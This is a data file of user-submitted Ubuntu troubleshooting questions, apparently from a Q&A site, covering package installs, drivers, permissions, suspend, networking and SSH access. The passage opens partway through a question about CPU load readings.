/usr/sbin/apach 3 root 20 0 0 0 0 s 0 0.0 4:16.15 ksoftirqd/0 243 root 20 0 0 0 0 s 0 0.0 17:38.27 md1_raid1 1344 mysql 20 0 481m 1996 512 s 0 0.1 8:40.40 mysqld 22219 www-data 39 19 430m 80m 6456 s 0 2.1 3:15.41 /usr/sbin/apach 28726 root 20 0 17456 1440 1008 r 0 0.0 0:00.03 top 29976 www-data 39 19 493m 112m 3988 s 0 2.9 18:13.70 /usr/sbin/apach 32406 root 20 0 761m 11m 5796 s 0 0.3 2:06.10 filezilla 1 root 20 0 24608 1924 896 s 0 0.0 0:01.22 init according to grep mhz /proc/cpuinfo they 're running : cpu mhz : 2200.000 cpu mhz : 2200.000 according to ps -eo pcpu , pid , args | sort -k 1 -r | head -15 ( suggested here ) they 're running : | % cpu pid command 6.7 1311 /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none 4.5 2944 /usr/lib/firefox/firefox 1.7 29976 /usr/sbin/apache2 -k start 1.7 17696 /usr/sbin/apache2 -k start 1.7 1731 /usr/sbin/apache2 -k start 1.7 1208 /usr/sbin/apache2 -k start 1.7 10551 /usr/sbin/apache2 -k start 1.6 22219 /usr/sbin/apache2 -k start 1.6 22216 /usr/sbin/apache2 -k start 1.6 20784 /usr/sbin/apache2 -k start 1.6 20778 /usr/sbin/apache2 -k start 1.6 20774 /usr/sbin/apache2 -k start 14.5 7269 gnome-system-monitor 0.2 8011 pidgin according to the processes tab of the system monitor they 're running : and according to the resources tab of the same system monitor they 're running : i never installed compiz , which is what most of the other people asking this question were pointed at as the culprit ( e.g . here ) , and compiz does n't show up in my processes list , so i do n't think the issue is there ( unless it 's hidden from me for some reason ) . any ideas as to why there is a discrepancy and how i can figure out just how much work i 'm putting the old machine through ?
505179	a faster ubuntu 14.04.1 , will lxde break things ?	i know using lxde instead of gnome will speed up my older machine . but , will some apps be unusable , since many seem to be designed just for use on the gnome desktop ? also , can anyone recommend other ways to speed up ubuntu , maybe some tweaking apps or a list of built in apps that can be disabled or removed without compromising safety ?
505181	how to run a cron job as a specific user ?	i have a couple of commands i want executed after the machine boots up . a user should n't have to log in or anything for them to run . i found this great answer suggesting crontab with the @ reboot keyword , however this will run as root , and i 'd like to run as a specific user created for these `` services '' ( not actual system services ) . what are someways to achieve that same effect with any given user ?
505190	packages are not installing !	i am trying to install packages using apt-get these are the following packages : root @ ubunto : / # sudo apt-get install build-essential libssl-dev libcurl4-gnutls-dev libexpat1-dev gettext unzip reading package lists ... done building dependency tree reading state information ... done package libcurl4-gnutls-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package build-essential e : unable to locate package libssl-dev e : package 'libcurl4-gnutls-dev ' has no installation candidate e : unable to locate package libexpat1-dev e : unable to locate package gettext e : unable to locate package unzip my main goal is to install package make , which i need to manually install a lower version of php this is what happened : root @ ubunto : ~/php-5.4.31 # make the program 'make ' is currently not installed . you can install it by typing : apt-get install make and then i go on and do 'apt-get install make' root @ ubunto : / # apt-get install make reading package lists ... done building dependency tree reading state information ... done package make is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'make ' has no installation candidate i am running ubuntu 14.04.1 lts on a virtual machine ( hyper-v ) if that helps
505194	lxde panel keeps rueverting to default	i recently reset the lxde panel to default and now it does it every time i reboot . i 'm using lubuntu 12.04 . it is a fresh install .
505196	enabling auth_basic in nginx displays 500 internel error	when i have auth_basic enabled on my website , all pages displays 500 internal error . here 's what my error log says : [ crit ] 10250 # 0 : *5 open ( ) `` /etc/nginx/passwd.d/dev.passwd '' failed ( 13 : permission denied ) the permissions to this file are root : root 640 . changing it to the nginx user does n't fix it either . any idea how to fix this ? p.s . os is ubuntu server 14.04 lts
505197	grub does n't appear at boot time	i have only ubuntu gnome installed in my system . when i start my laptop it is directly booting to ubuntu gnome . instead , i want to see the grub menu every time i switch on my laptop .
505200	how to clean data when wiping/reinstalling a compromised server ?	i have a server that has been compromised , where the logs have been blown out and i have neither the ability nor the time to discover what actual pieces of the system were modified . the server was taken offline , and about 400 gigs of research data from multiple users was pulled onto another offline backup . i 've scanned the directories with clam , but am concerned that there may be remnants of malicious code dropped somewhere in the thousands of files . the files represent years of data logging , but i have no backups against which i could compare them ( this penetration was the first i was told about these servers `` under my control '' , and some serious changes are coming ) , nor knowledge of what should/should n't be contained within . is there some more thorough method for assuring that the data does not contain dormant pieces of malicious code ? i can attempt to prevent scripts from executing from within my backup directories , but i 'm assuming at some point one of the users will wonder why some code they wrote 2 years ago is n't working and will wind up undoing any security i add . tl ; dr : i 've been owned . how do i make sure that the data i am copying over to the fresh server installation will not contain potentially malicious code ?
505201	laptop hangs on exit of suspend mode when using ubuntu 14.04.1 lts ?	i have an asus s56ca laptop that is using ubuntu 14.04.1 lts as a sole operating system . previous to this i was using ubuntu 14.04 and had lots of unwanted documents , images , videos etc and also had picked up a few viruses . i decided the easiest way to go about resolving this issue was to do a complete clean install of ubuntu . i downloaded the ubuntu 14.04.1 lts iso ( 64 bit ) from here : http : //www.ubuntu.com/download/desktop and created a bootable usb using the 'startup disk creator ' tool that comes pre-installed with ubuntu on a brand-new 8 gigabyte usb . i then booted from this , installed the os and installed the latest updates with no issues . however , the only issue i have noticed is that my laptop will not wake from suspend . ( please note that this was an issue present on the laptop before the clean install but i thought it was down to one of said viruses . ) i know that this is a known issue but i though that this would have been fixed folllowing the latest updates . does anyone know any way around these issues ? edit : i should have mentioned that : - upon opening the lid/clicking the power button once to resume from suspend : all is can see is a blank , black screen with my cursor which can not be moved . no key provides a response apart from the power key to preform a hard reset . -using the terminal to suspend and resume : if i were to use the command sudo pm-suspend the laptop will suspend and resume before showing me the screen which i had entered the command on ( shows the terminal and any other windows that were currently visible when command was executed ) but i can not interact with this in any way . again , the only button that responds is the power key in order to preform a hard reset . previous fixes attempts i have tried using a script that made the graphics card do a reboot ( using chvt1 and chvt7 i believe ) but this just made the laptop unable to suspend at all . i have also tried using the fix mentioned here : unable to resume after suspend but reached the area where it stated 'fail ' . i tried using the code provided but it returns : bash : /var/log/pm-suspend.log : permission denied
505202	need advice on size of root partition for latest ubuntu or ubuntu clone distro ?	i have two hard drives a samsung 750gigs and a western digital green 2 tb . my current partition scheme consists of only 3 ntfs partitions : 750 : c : 75 gigs windows 7 home premium d : 675 gigs for games and other stuff 2000 : e : 2 tb for remaining storage and 4gigs of ram i plan to dual boot linux ubuntu or a similar flavor of it ( i assume they mostly have the space requirements ) my question is mainly about the size of the root partition and maybe also the swap partition . i plan to install a root swap and home partition on the 2 tb hard drive and leave the other hdd for windows 7 and windows games . but , i am slowly transitioning to linux , hopefully completely and want to know how large should be the root partition if i plan to install a lot of software and linux games from the repositories and maybe sourceforge and other sources so i would not need to resize the root in the foreseeable future ? thank you in advance .
505210	ca n't alternate users , need to logoff to login other on ubuntu	i installed from scratch the ubuntu 14.04 and configured it with a samba share . there is a windows share raid 1 drive ( 2 x 1 tb ) with mdadm , that dropbox and more 2 backup solutions access ( acronis and allway sync ) . it 's perfect functioning , except by a weird thing : i ca n't alternate users , need to logoff to login other on ubuntu ! when a click or enter on the other user name , nothing happens . i installed other 3 machines with the same settings - except by the raid 1 drives - and only has this symptom . any clue ? tia
505214	how to revert : alt suddenly stopped to help special char creation ?	i guess i 've unintentionally pressed some key combination that changes function of right alt . i want it to change normal latina letters into special letters ( as it is by default ) .
505216	how do i fix this issue ( webcam not working )	i have a problem with my webcam working in browser , i tried firefox and chromium first . when i go to the flash plugin setting http : //www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html it does n't show the websites that i want to allow to access the webcam . so i used chrome . in chrome i was able to allow flash to access my webcam but still does n't work . ps the cam works on cheese booth without an problem , and am using ubuntu 14.04
505217	why can i compile against libclang-3.5.so and not against libclang.so ?	i am trying to compile a c source file , that needs to be linked against a dynamic library i installed through apt-get ( libclang.so ) . apt-get installed the clang shared libraries in /usr/lib/x86_64-linux-gnu/ . here are the relevant files : $ ls -l /usr/lib/x86_64-linux-gnu/libclang* lrwxrwxrwx 1 root root /usr/lib/x86_64-linux-gnu/libclang-3.4.so - > libclang-3.4.so.1 -rw-r -- r -- 1 root root /usr/lib/x86_64-linux-gnu/libclang-3.4.so.1 lrwxrwxrwx 1 root root /usr/lib/x86_64-linux-gnu/libclang-3.5.so - > libclang-3.5.so.1 -rw-r -- r -- 1 root root /usr/lib/x86_64-linux-gnu/libclang-3.5.so.1 lrwxrwxrwx 1 root root /usr/lib/x86_64-linux-gnu/libclang.so.1 - > libclang-3.5.so.1 the loader seems to know about libclang : $ ldconfig -p | grep clang libclang.so.1 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libclang.so.1 in fact , my problem is reproducible no matter what the content of the source file i 'm trying to compile is , as long as it contains valid code . so , i used this source file : $ cat a.c int main ( int argc , char** argv ) { return 0 ; } compiling against clang fails : $ gcc a.c -l/usr/lib/x86_64-linux-gnu -lclang /usr/bin/ld : can not find -lclang collect2 : error : ld returned 1 exit status but compiling against clang-3.5 ( or clang-3.4 ) succeeds : $ gcc a.c -l/usr/lib/x86_64-linux-gnu -lclang-3.5 $ i really need to be able to link using -lclang and not -lclang-3.5 , because actually i can not control how this compiler option is generated in my real-world problem . what can i do to make -lclang work ? i 'm using ubuntu 14.04 lts and gcc 4.8.2 .
505218	need to find network driver for ubuntu 14.04	i 'm having an issue finding a driver for my network card . i ca n't connect to the internet at all ( no wireless dongle on the pc ) , and therefore , ca n't update or download anything because ... well , internet . i have the ethernet plugged in , everything works , but i just do n't have the driver . it 's a bigfoot networks killer ethernet controller . it 's my first time posting , so if you guys need more info , let me know what i have to do . thanks a ton ! edit : here 's what i got after the lspci command : usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 03 ) ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8110sc/8169sc gigabit ethernet [ 10ec:8167 ] ( rev 10 )
505220	debug overheating issue on sony vaio pro 13 /w intel haswell	i am using my sony vaio pro 13 powerbook since about a year now . i installed ubuntu on the first day . recently i realized that the system gets hot even without load . i can not say when it started but it now occurs on ever fresh boot . it even gets hot when i am just viewing the bios ! sensors are showing on idle ubuntu operation : $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +49.0°c ( crit = +97.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +50.0°c ( high = +100.0°c , crit = +100.0°c ) core 0 : +50.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +49.0°c ( high = +100.0°c , crit = +100.0°c ) my pci configuration is : $ lspci -v 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) subsystem : sony corporation device 90b6 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : sony corporation device 90b6 flags : bus master , fast devsel , latency 0 , irq 60 memory at f7000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) subsystem : sony corporation device 90b6 flags : bus master , fast devsel , latency 0 , irq 62 memory at f7f14000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : sony corporation device 90b6 flags : bus master , medium devsel , latency 0 , irq 56 memory at f7f00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) subsystem : sony corporation device 90b6 flags : bus master , fast devsel , latency 0 , irq 58 memory at f7f1d000 ( 64-bit , non-prefetchable ) [ size=32 ] capabilities : < access denied > kernel driver in use : mei_me 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) subsystem : sony corporation device 90b6 flags : bus master , fast devsel , latency 0 , irq 61 memory at f7f10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : f7e00000-f7efffff prefetchable memory behind bridge : 00000000df200000-00000000df3fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f7400000-f7dfffff prefetchable memory behind bridge : 00000000f0000000-00000000f09fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : sony corporation device 90b6 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7f1b000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) subsystem : sony corporation device 90b6 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : sony corporation device 90b6 flags : bus master , 66mhz , medium devsel , latency 0 , irq 57 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7f1a000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) subsystem : sony corporation device 90b6 flags : medium devsel , irq 3 memory at f7f19000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] 01:00.0 network controller : intel corporation wireless 7260 ( rev 6b ) subsystem : intel corporation dual band wireless-n 7260 flags : bus master , fast devsel , latency 0 , irq 59 memory at f7e00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi top is displaying all processes < 3 % . tlp is installed and running . questions : what could be my next debugging step ? is it most likely a driver issue ?
505222	error installing ubuntu 14.04 on virtualbox 3.1.8	sorry if i do n't provide the correct amount of information to diagnose the problem , i am fairly new to using virtualbox / machines . i 've been trying to install ubuntu 14.04.1 on virtualbox 3.1.8 without success . not sure what the policy is on linking images so excuse me if i am breaking a rule . i can type out the error message if absolutely needed . error message :
505225	problem with unetbootin ( or , perhaps , me )	as i mentioned before , i 'm having a lot of stability issues on lubuntu 13 , so i 'm trying to upgrade to the alternate install of lubuntu 14.04 , as my computer has about 500mb ram . i went to unetbootin as i usually do , but this time around in creating the usb , i got a strange screen that said `` unetbootin '' , and within the box was a statement saying `` hit tab to edit options '' or something like that . the weird part is that on the bottom there was a timer ticking down when it 'll automatically reboot , but every time it reaches zero it simply starts over again , indefinitely . if i do hit tab , it puts me in a `` boot : '' prompt , i think , and whatever i enter , it simply says it ca n't kind the kernel image . i 've never had this kind of trouble with unetbootin , so i do n't know what to make of it . so far i 've tried : reformatting the usb and making sure it 's fat upgrading to the latest version of unetbootin doing an md5sum on the .iso to verify that it 's not broken ( it is n't ) fooling with the memory value on the unetbootin command box , to see if having a value originally set at zero was the problem i 've spent quite some hours deleting files , rebooting over and over again , and so on , so right now i 'm at a loss as to how to progress further . any input would be much appreciated . edit : i also must mention that due to connection problems , i had to get a friend put the alternate .iso on a flashdrive for me , so i 'm pretty much stuck with installing it or of getting an ultra-small system like puppy linux . it 's just not feasible for me to download another .iso . plus , i 'd like to stick with the alternate install , for while my computer might be able to handle the standard edition , due to all the screwups , cpu freezes , and whatnot i 'd just like to try a hardware friendlier version . edit2 : i 'm exploring , doing trial and error , and whathave you , and i 'd also like to mention that i did do an md5sum ( if i wrote that correctly ) to verify that the file is complete and not corrupted .
505227	ubunut 14.04 freezing nothing in syslog ?	i am running ubunut 14.04 . recently and not exactly sure when it started , my ubunutu has been freezing . everything becomes unresponsive and just hangs . i can not get into any other tty , and nautilus does n't recover . problem is i see nothing in the /var/syslog was expecting a segfault or something , but not sure where else to look ? any suggestions .
505229	permission denied while downloading torrent ?	i am running ubuntu server 14.04 x64 . on that server i have a samba shares named media and a deluge daemon that i access through a deluge client on my ubuntu 14.04 desktop laptop . when i attempt to download a torrent , it says error and under details it says `` permission denied in /where/i/am/downloading/ '' i am downloading to a directory in my media samba share . the deluge daemon is running under a user `` deluge '' that has no password . i do n't know if the problem is in the mounting partitions , user rights of deluge , or the samba share . when i run chmod 777 -r /media/media the problem goes away , but comes back on the next reboot . these are my /etc/fstab and /etc/samba/smb.conf # /etc/fstab entry uuid=1827323c-72a9-4d1f-a2cb-e6227d8f3e2d /media/media/ ext4 defaults 0 1 # /etc/samba/smb.conf entry [ media ] comment = movies , music , etc path = /media/media/ writeable = yes browsable = yes guest ok = yes read only = no create mask = 777 directory mask = 777
505230	upgraded from 12.04 to 14.04 - problems in firefox/icedtea/java	i just upgraded from 12.04 to 14.04 . on 12.04 i was using the icedtea plugin in firefox to run certain java applets . now on 14.04 , i get the missing plugin screen in firefox : when i click on the icon in the upper left to `` install missing media '' i get this prompt `` would you like to install the plugin this media needs to display on the page '' ? - only one option is available - install java . i invoked that option but it proceeds to fail : how do i fix this ? icedtea is installed on my machine - it 's there in software center . java is installed - it 's all over the place . i have several java apps running fine . what am i missing ?
505233	xubuntu running games extremely slow	so i 've lately been trying to get my games back that i used to play on windows because i had just switched to xubuntu . but when running any game i see that the games are running extremely slow . i do n't have integrated graphics . i have 8gb ddr3 ram and 2gb nvidea graphics card . my specific computer model is the asus g750jw rog gaming laptop . it does n't just happen when i 'm using wine but also when i 'm just using the regular steam client . games will usually run at around 2-10fps . i do n't have any bad blocks on my hard disk ( i did the badblocks command ) . but i 'm still unsure because games start to run slower when i turn up the resolution . any help is much appreciated !
505234	wireless drivers & lack of packages ?	i 'm attempting to install wireless drivers for my usb wifi dongle . i installed ubuntu 14.04.1 lts server . i got the linux drivers from here : http : //www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wireless_adapters_n150/ew-7811un so i transferred it via usb stick and found ubuntu did not come with unzip.. ? concerning . told me to use apt-get , but of course i have no wireless yet . so i got it unzipped on a windows pc and moved to ubuntu via usb stick , and started to install it . i ran the install script and it finished up with a make ... except ubuntu did not come with make either ! at this point i 'm stuck . no internet to apt-get it , and no make to get internet . no wire connection either . what do i do ? i do have a usb stick i can transfer from a windows machine . anything i can use that to accomplish it ? transfer a compiled file ? ( but i do n't have another ubuntu machine ) or is there a standard wireless driver i can use that would be located on my install usb ?
505236	ubuntu unity corner resizing pointer hard to get to display	it seems that a very meticulous hand is needed to get the corner-shaped pointer to display at the corner of a window in order that the window can be re-sized . is there anyway to make this more likely to appear ?
505239	changing user group from standard to admin	my user account was in admin group and had sudo priviliges . i was working out a cvs tutorial where i must have moved my user account to some other group . i could no longer use sudo nor can i add myself back to the sudoers file or use any superuser commands . how do i go about returning the account to admin ? note that this was the only user account on my system . i am using 14.04 lts .
505243	how to remove unused or outdated folders ?	i administrate a multi-user system that has had quite a lot of user turnover . the users who have left us still have a folder in the folder /home . i would like to remove the folders for the users that are no longer with us , but i do n't want to have to sort through each and every folder and remove them one by one using '-rm ' . is there a command to remove folders that have not been accessed in a certain amount of time ? thanks !
505244	how to transfer files from putty ( linux ) directory to windows folder ?	i just want to ask on how am i going to transfer my files in putty ( linux terminal ) directory to my windows c : \xampp\mysql folder . is there any command for this ?
505247	help to find partition on ubuntu	recently when trying to turn on the computer ( win 7 64bit ) it began to occur the legendary bsod making it to restart over and over . when trying to repair the problem the computer freezes on a black screen or when starting it normally , the blue screen attacks appears again . i took my pc to a shop and they told me that the hard hd ( seagate 3tb ) is damaged and needs to be replaced . so , after this i booted ubuntu 12:04 via cd and managed to recover the files from c : hd . however , i am not able to locate the partition d : to recover some movies that i had left there . could anyone tell me how can i access the partition d : from windows via ubuntu ? another informations : a ) i do not installed ubuntu , when i try it , this message appears : '' no root file system is defined . please correct this from the partitioning menu . '' - actually i prefer not to install it if possible , because i 'm not too familiar with this os . i think this is my last shot to recover those files , please help ! thanks .
505255	having trouble connecting to my aws ec2 instance	i manually configured an aws ec2 instance with ubuntu , ruby , mysql . this instance is configured with both a key and password based login . for key login , i can ssh in using ubuntu as a user name and the key . i created an image from this instance , and then used the image to create a new instance . i did not change anything . i am using the same key for the new instance . i was expecting to be able to ssh using the same key and the login name ubuntu , but it 's not allowing me to connect . i also tried using the same login name and password as the original instance , but it wo n't let me login either . any ideas ? system log file : generating public/private rsa key pair . your identification has been saved in /etc/ssh/ssh_host_rsa_key . your public key has been saved in /etc/ssh/ssh_host_rsa_key.pub . the key fingerprint is : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx the key 's randomart image is : ... ... ... ... ... ... ... .. generating public/private dsa key pair . your identification has been saved in /etc/ssh/ssh_host_dsa_key . your public key has been saved in /etc/ssh/ssh_host_dsa_key.pub . the key fingerprint is : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx the key 's randomart image is : ... ... ... ... ... ... .. generating public/private ecdsa key pair . your identification has been saved in /etc/ssh/ssh_host_ecdsa_key . your public key has been saved in /etc/ssh/ssh_host_ecdsa_key.pub . the key fingerprint is : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx the key 's randomart image is : ... ... ... ... ... ... . ec2 : ec2 : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ec2 : -- -- -begin ssh host key fingerprints -- -- - ec2 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx ( dsa ) ec2 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx ( ecdsa ) ec2 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx ( rsa ) ec2 : -- -- -end ssh host key fingerprints -- -- - ec2 : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # -- -- -begin ssh host key keys -- -- - ecdsa-sha2-nistp256 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx= root @ ip-10-xxx-xx-xxx ssh-rsa xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root @ ip-10-xxx-xx-xxx -- -- -end ssh host key keys -- -- - cloud-init boot finished at thu , 31 jul 2014 17:12:41 +0000 . up 52.59 seconds
505256	what can do with my windows license ?	i am considering purchasing a new dell laptop from ebay to install ubuntu onto . the computer comes with windows 8 pre-installed , but i will never be using or needing windows . while i am aware that computers are sold with ubuntu , they are few and far between and , as mentioned above , since the model i am planning on buying would be from a reseller ( ebay ) , not from the manufacturer , i ca n't request anything special . . . so , is there anything i can do with the windows installation ? i would love it if there was a way to sell it , but i think that might classify as piracy . i really hate to totally waste the part of the device 's price from the manufacturer purchasing the license from microsoft . is there something good or cool or fun or crazy or otherwise beneficial to me that i could do with this windows 8 license i will never really use ? even if it 's just fun ? any ideas ?
505259	clipboard shortcut key ctrl- ;	i just find out there is a shortcut key for display the top 5 entries of system clipboard , it 's ctrl- ; . you can use push ctrl- ; in gedit , terminal or even in web browser , to get the top 5 entries of you clipboard content and press num 1 to 5 to paste the content . it 's terrific . i just want to know which application provides this function and the setting place . b.t.w. , i do n't find the setting in system setting - > keyboard - > shortcuts
505261	how do you change the default home page in the ubuntu web browser ?	how do you change the default home page in the ubuntu web browser ? or unity browser ... . the one that is now bundled with the os in prep for the touch edition .
505262	i have an ubuntu option on boot , but ubuntu is not installed and i want to get rid of it	my laptop originally came with windows 8 , a while back i tried to install ubuntu , but it did n't work so i just deleted everything . today i did a factory reset on my laptop because i am going to sell it , but when i boot it boots to a black screen that says `` gnu grub version 1.99-21ubuntu3.1 '' followed by a bunch of text . to access windows 8 i have to hold down f11 on boot where i get the option for windows boot manager . i want to make windows 8 the default , how to i get rid of this `` ghost '' ubuntu ?
505265	synaptic touchpad on laptop not working after update	i have found this solution from a thread a while ago but its temporary fix only : this seems to be a bug in 12.04.2 . as stated in comments , a simple fix would be unloading the mouse driver and load it again like this : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps this only keeps the touchpad working on this session . to make it permanent one can create a file like /etc/modprobe.d/psmouse.conf ( you can choose the name you want , but you must keep the extension ) with the following content : options psmouse proto=imps ~~ salem 's answer to synaptic touchpad on laptop not working my question is how to make a permanent file like he was talking about . i do n't have any idea how to do that in ubuntu . that answer ( sudo modprobe -r psmouse & & sudo modprobe psmouse proto=imps ) works on my 12.04 system but after i have shut down my laptop the weird problem comes back . i do n't really know how to make the solution permanent because what he said was that it is just a temporary fix .
505268	online accounts-facebook account showing in hindi language	i 've just installed ubuntu trusty tahr ( 14.04 ) and while configuring facebook account in empathy , the labels are showing in hindi language but not in english . how to change this to english .
505270	how to stop getting error messages in terminal	when i open the chrome browser through terminal , i keep getting some error messages in the terminal . [ 3067:3067:0801/081834 : error : console ( 121 ) ] `` uncaught strict get failed , invalid object . `` , source : https : //www.google.co.in/xjs/_/js/k=xjs.ntp.en_us.aonb8i0mseg.o/m=jsa , ntp , pcc , csi/rt=j/d=1/t=zcms/rs=aitrstpaq-zb-zqijvvz6la9yqedbn_uxw ( 121 ) [ 3067:3067:0801/081834 : error : console ( 121 ) ] `` uncaught strict get failed , invalid object . `` , source : https : //www.google.co.in/xjs/_/js/k=xjs.ntp.en_us.aonb8i0mseg.o/m=jsa , ntp , pcc , csi/rt=j/d=1/t=zcms/rs=aitrstpaq-zb-zqijvvz6la9yqedbn_uxw ( 121 ) how can i get rid of these ? i have an alias chrome created for chromium browser in .bashrc file . i am using ubuntu 12.04
505271	where is `` my computer '' ?	in ubuntu 12.10 , there was file system which is ubuntu installation drive , and computer , which was opening `` my computer '' equivalent of windows . now computer drive showing file system and as i remember giving computer : // command in terminal was opening my computer . and i had added same command to custom shortcut which was working fine to open my computer . my computer view is better to use for me . so please tell me how can i open my computer equivalent of windows in ubuntu 14.04 .
505272	how to fix slow and periodic unresponsiveness with my network ?	i recently installed ubuntu 14.04 alongside windows 7 pro on a dell optiplex 380 . i am using an edimax usb network adapter ( ew-7811un ) . the network / internet works just like my other computers when booted to windows ( i.e . the same download speed ) . however , when booted to ubuntu , the network is sometimes slow and sometimes unresponsive for a period of time . as i was installing updates after initial installation , the downloads often timed out . this has continued when downloading other software or using web mail . i tried to install the current driver from edimax , but could not get it to fully install . i then called edimax and they said the usb network adapter should work fine without installing the driver . any suggestions ? i am fairly new to networking and ubuntu , so please keep that in mind with your responses .
505273	sound issues : master volume stuck at 0 in alsa sound mixer : (	http : //www.alsa-project.org/db/ ? f=12d99c98ffc9b7675fc5b4410ca123e7d89b5009 i 'm trying to use the onboard 3.5mm jack for audio . in the alsa mixer i can unmute the master audio but when i press the up arrow the level stays at 0 . i dropped in a legacy creative pci sound card and that played audio no problem but i cant get the `` hda ati sb '' device to output squat . any help would be appreciated . edit : here 's a potato quality screenie of what i 'm looking at http : //imgur.com/syeqzbs
505282	i need the source code to build a ubuntu phone rom for the moto x	if i could get the source code for ubuntu phone os , i could compile a build of the os for the moto x , which a good number of people want .
505283	evolution crashes when creating new folder	i have checked if the above mentioned item is already answered but none were found . hence creating a question here . i am thunderbird user until last week . start of this week i decided to try evolution and configured on my ubuntu 14.04 machine . i created imap account and all the mails were synchronized though with some difficulty as the data is almost 4 gig . it is a good email client and so i decided to use it for longer time and started creating rules and updating contact information . that is when i started facing trouble . when i create a new folder , evolution silently closes down without even a warning . but when i reopen the evolution , i can see that new folder is created . is this the normal behavior of evolution when the account is imap and a new folder is created ? when i modify contacts , though not in all cases , it crashes and silently closes down . in this case the changes will not be updated too . the third issue is that when i created a calendar invite , all outlook users could read it properly but none of the thunderbird users could read it . is there something i can do to ensure it is readable on both the email clients ( outlook and thunderbird ) . i am using evolution 3.10.4 . any suggestions , pointers would be appreciated . thanks
505284	where can i get ubuntu for a smartphone ?	i have been to the ubuntu website : http : //www.ubuntu.com/phone , where it appears that you can get it for any smartphone , but where do i do so ? i do n't see a specific 'download ' or 'installation process ' link . the only thing i find is where i can fill out a form to contact them , but that is just for developers . i only want to install it on my personal phone , no developing .
